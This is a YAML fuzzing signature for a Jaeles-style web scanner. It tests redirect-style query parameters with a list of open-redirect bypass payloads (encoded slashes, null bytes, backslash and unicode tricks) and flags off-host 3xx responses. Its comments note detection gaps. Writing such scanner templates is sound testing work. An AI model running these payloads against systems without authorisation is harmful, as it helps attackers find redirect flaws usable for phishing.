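---
# Fuzz signature for a template-driven web scanner (Jaeles-style syntax —
# confirm against the consuming tool): probes common redirect-style query
# parameters and reports 3xx responses whose Location header leaves the host.
# Placeholders such as {{.dest}}, {{.prefix}}, {{.name}}, {{.payload}} and
# {{.Host}} are expanded by the scanner, not by the YAML parser, so every
# value containing them is quoted to keep YAML from interpreting `{` or `\`.
id: open-param-fuzz-01
type: fuzz
# The original file declared `level` twice (first 2, then 4). Duplicate keys
# are invalid YAML and most parsers silently keep the last value, so 4 is the
# value that was actually in effect; the duplicate is removed here. Confirm
# the intended severity level with the signature's author.
level: 4
info:
  name: Open Redirect FUZZ on Param
  risk: Medium
variables:
  # Each block scalar lists one candidate per line; the scanner is assumed to
  # split on newlines and iterate the cross product — verify against the tool.
  - prefix: |
      http://
      https://
  - dest: |
      google.com
      example.com
  # Query-parameter names commonly used to carry a post-action redirect target.
  - name: |
      next
      url
      target
      to
      rurl
      return
      dest
      redirect
      destination
      redirect_uri
      redirect_url
      redir
      view
      image_url
      go
      returnTo
      return_to
      checkout_url
      continue
      return_path
# Single quotes keep backslashes and braces literal for the YAML parser.
payloads:
  - '{{.dest}}'
  - '/{{.dest}}'
  - '\{{.dest}}'
  - '//{{.dest}}/'
  - '\/\/{{.dest}}/'
  - '%00\/\/{{.dest}}/'
  - '/%00/{{.dest}}/'
  - '/%09/{{.dest}}/'
  - '/%0a/{{.dest}}/'
  - '/%0d/{{.dest}}/'
  - '////{{.dest}}/%2f%2e%2e'
  - '/%5c{{.dest}}/%2f%2e%2e'
  - '/〱{{.dest}}/%2f%2e%2e'
  - '@{{.dest}}'
  - '{{.prefix}}{{.dest}}'
  - '/{{.prefix}}{{.dest}}'
  - '\{{.prefix}}{{.dest}}'
  - '//{{.prefix}}{{.dest}}/'
  - '\/\/{{.prefix}}{{.dest}}/'
  - '%00\/\/{{.prefix}}{{.dest}}/'
  - '////{{.prefix}}{{.dest}}/%2f%2e%2e'
  - '/%5c{{.prefix}}{{.dest}}/%2f%2e%2e'
  - '/〱{{.prefix}}{{.dest}}/%2f%2e%2e'
  - '@{{.prefix}}{{.dest}}'
requests:
  - generators:
      # Injects each payload as the value of each candidate parameter name.
      - Query("{{.payload}}", "{{.name}}")
    detections:
      # Report a 3xx whose Location header carries a scheme followed by
      # {{.dest}}, unless the redirect points back at the scanned host over
      # https. Two caveats visible in the expression: the self-host exclusion
      # only covers `https://{{.Host}}`, so an `http://` redirect back to the
      # same host is still reported (false positive), and the regex requires
      # `http`/`https?:` before the slashes, so a scheme-relative Location
      # (`//host`) is not matched even though several payloads are of that form.
      - >-
        (StatusCode() >= 300 && StatusCode() < 400) && RegexSearch("resHeaders", "Location:\\s(http|https?:)([\\/]+){{.dest}}") && !StringSearch("resHeaders", "Location: https://{{.Host}}")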